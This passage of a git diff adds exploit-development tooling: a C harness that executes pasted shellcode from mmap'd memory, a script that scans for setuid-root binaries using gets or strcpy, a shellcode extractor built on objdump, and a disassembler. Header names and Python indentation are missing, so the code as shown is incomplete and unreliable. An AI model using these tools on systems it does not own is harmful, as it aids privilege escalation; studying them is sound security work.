exit(0); /* exit() */ +} diff --git a/Memory_Exploits/C-codes/testing_shellcode4.c b/Memory_Exploits/C-codes/testing_shellcode4.c new file mode 100644 index 0000000..64db9e5 --- /dev/null +++ b/Memory_Exploits/C-codes/testing_shellcode4.c @@ -0,0 +1,25 @@ +/* Sys mman shellcode tester */ +#include +#include +#include +#include +#include + +int (*shellcodetotest)(); +char shellcode[] = ""; /* Put your shellcode here */ + +int main(int argc, char **argv) +{ + void *ptr = mmap(0, 150, PROT_EXEC | PROT_WRITE| PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); + if(ptr == MAP_FAILED) + { + perror("mmap"); + exit(-1); + } + + memcpy(ptr, shellcode, sizeof(shellcode)); + shellcodetotest = ptr; + shellcodetotest(); + return 0; +} + diff --git a/Memory_Exploits/bash/find_setuid_programs.sh b/Memory_Exploits/bash/find_setuid_programs.sh new file mode 100644 index 0000000..2ec6177 --- /dev/null +++ b/Memory_Exploits/bash/find_setuid_programs.sh @@ -0,0 +1,9 @@ +#Find setuid programs +#!/bin/sh +tempfile="/tmp/$0.$$" +trap "rm $tempfile" 0 +find / \( -type f -a -user root -a -perm -4001 \) -print > $tempfile +for file in `cat $tempfile`; do +strings -a $file | awk '/^gets$|^strcpy$|^strcat$|^sprintf$/\ +{ printf ("%-10s \t %-50s \n"), $1, file }' "file=$file" - +done diff --git a/Memory_Exploits/bash/get_shellcode_form_an_exe.sh b/Memory_Exploits/bash/get_shellcode_form_an_exe.sh new file mode 100644 index 0000000..ff0635e --- /dev/null +++ b/Memory_Exploits/bash/get_shellcode_form_an_exe.sh @@ -0,0 +1,17 @@ +#Get Shellcode form an executable file +#!/bin/bash +if [ $# -ne 1 ] +then + printf "\n\tUsage: $0 filename.o\n\n" + exit +fi +filename=`echo $1 | sed s/"\$"//` +rm -f $filename.shellcode + +objdump -d $filename | grep '[0-9a-f]:' | +grep -v 'file' | cut -f2 -d: | + cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | +sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | + sed 's/^/"/' | sed 's/$/"/g' + +echo diff --git a/Memory_Exploits/python-codes/eggdis.py b/Memory_Exploits/python-codes/eggdis.py new file mode 100644 index 0000000..2594ab9 --- /dev/null +++ b/Memory_Exploits/python-codes/eggdis.py @@ -0,0 +1,10 @@ +#! /usr/bin/env python +import sys +from libdisasm import disasm,disasmbuf +dbuf = disasmbuf.DisasmBuffer(sys.stdin.read( )) +d=disasm.LinearDisassembler( ) +d.disassemble(dbuf) +for rva,opcode in dbuf.instructions( ): +operands = map(lambda x:"%s %-13s" % (x.access( ),"[%s]" % str(x)), +opcode.operands( )) +print "%08x: %-20s %s" % (rva,str(opcode), "".join(operands))